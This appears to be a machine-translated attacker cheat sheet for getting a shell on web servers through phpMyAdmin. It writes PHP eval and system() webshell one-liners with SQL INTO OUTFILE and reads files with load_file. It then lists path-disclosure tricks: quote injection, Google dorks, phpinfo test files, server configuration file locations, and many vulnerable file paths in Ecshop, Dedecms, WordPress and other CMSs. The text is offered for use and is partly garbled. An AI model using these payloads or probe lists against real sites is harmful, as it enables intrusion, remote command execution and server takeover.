phpMyAdmin, get the shell.

Method One:

CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);

INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' <?php @eval ($_post[xiaoma])?> ');

SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';

----above at the same time, in the database: MySQL create a table named: Xiaoma, Field xiaoma1, export to e:/wamp/www/7.php

A word connection password: Xiaoma

Method Two:

Create TABLE Xiaoma (xiaoma1 text not NULL);

Insert into Xiaoma (XIAOMA1) VALUES (' <?php eval ($_post[xiaoma])?> ');

Select Xiaoma1 from Xiaoma to outfile ' e:/wamp/www/7.php ';

Drop TABLE IF EXISTS xiaoma;

Method Three:

Read file contents: Select Load_file (' e:/xamp/www/s.php ');

Write a word: select ' <?php @eval ($_post[cmd])?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '

CMD execution permissions: select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '

Method Four:

Select Load_file (' e:/xamp/www/xiaoma.php ');

Select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '

Then visit the Site Directory: Http://www.xxxx.com/xiaoma.php?cmd=dir

PHP Explode Path Method collection:

1. Single-Quote Burst path

Description

Add single quotation marks directly after the URL, requiring that the single quotation mark is not filtered (Gpc=off) and the server returns an error message by default.

www.xxx.com/news.php?id=149′

2, error parameter value explosion path

Description

Change the value of the parameter to be submitted to an error value, such as-1. -99999 single quotes are filtered when you may try.

Www.xxx.com/researcharchive.php?id=-1

3. Google explode path

Description

Combined with the keyword and site syntax to search the page snapshot of the error page, common keywords have warning and fatal error. Note that if the target site is a level two domain name, site is connected to its top-level domain name, so that it gets much more information.

SITE:XXX.EDU.TW Warning

Site:xxx.com.tw "Fatal error"

4. test file explosion path

Description

There are test files in the root directory of many Web sites, and the script code is usually phpinfo ().

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5, phpMyAdmin explosion path

Description

Once you find the admin page for phpMyAdmin and then access some of the specific files in that directory, you are likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google. PS: Some BT websites will be written as phpMyAdmin.

1./phpmyadmin/libraries/lect_lang.lib.php

2./phpmyadmin/index.php?lang[]=1

3./phpmyadmin/phpinfo.php

4. Load_file ()

5./phpmyadmin/themes/darkblue_orange/layout.inc.php

6./phpmyadmin/libraries/select_lang.lib.php

7./phpmyadmin/libraries/lect_lang.lib.php

8./phpmyadmin/libraries/mcrypt.lib.php

6. configuration file Find path

Description

If the injection point has file Read permissions, you can manually load_file or tool to read the configuration file, and then look for path information (typically at the end of the file). Web server and PHP configuration file default path under each platform can be checked online, here are a few common.

Windows:

C:\windows\php.ini PHP configuration file

C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file

Linux:

/etc/php.ini PHP configuration file

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf Apache configuration file

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file

7, Nginx file type Error resolution explosion path

Description

This is the method that was inadvertently discovered yesterday, of course, requires the Web server is Nginx, and there is a file type parsing vulnerability. Sometimes add/x.php after the picture address, the picture will not only be executed as PHP file, but also may burst the physical path.

www.xxx.com/top.jpg/x.php

8. Other

Dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

Wp

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

Ecshop Mall System Burst Path Vulnerability file

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

Ucenter Blast Path

ucenter\control\admin\db.php

Dzbbs

Manyou/admincp.php?my_suffix=%0a%0dtoby57

Z-blog

admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php

php168 Blast Path

Admin/inc/hack/count.php?job=list

Admin/inc/hack/search.php?job=getcode

Admin/inc/ajax/bencandy.php?job=do

Cache/mysqltime.txt

Phpcms2008-sp4

Registered user Access after login

Phpcms/corpandresize/process.php?pic=. /images/logo.gif

Bo-blog

Poc:

/go.php/<[evil Code]

Cmseasy website Path Vulnerability

The vulnerability appears in the menu_top.php file

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php

phpMyAdmin, get the shell.